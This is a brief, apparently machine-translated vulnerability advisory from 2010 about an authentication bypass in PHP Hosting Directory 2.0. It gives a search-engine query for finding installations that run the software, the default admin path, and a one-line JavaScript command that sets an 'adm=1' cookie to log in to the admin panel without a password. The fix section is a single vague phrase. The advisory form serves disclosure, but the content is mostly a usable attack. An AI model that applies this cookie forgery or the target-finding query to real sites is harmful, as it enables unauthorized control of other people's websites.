PHP Hosting Directory 2.0 background verification bypass vulnerability and fix-vulnerability warning-the black bar safety net

2010-10-12T00:00:00
ID MYHACK58:62201028088
Type myhack58
Reporter 佚名
Modified 2010-10-12T00:00:00

Description

PHP Hosting Directory 2.0 program background verification is not strictly, can lead to bypass the password verification sign in the background.

Google: "powered by PHP Hosting Directory 2.0"

Default background:http://127.0.0.1/admin

Use method:

Do not need to enter any password, through cookies deceived into the background.

javascript:document. cookie = "adm=1; path=/";

Refresh to log in to the backend Control Panel.

Repair solutions:

Strengthening filter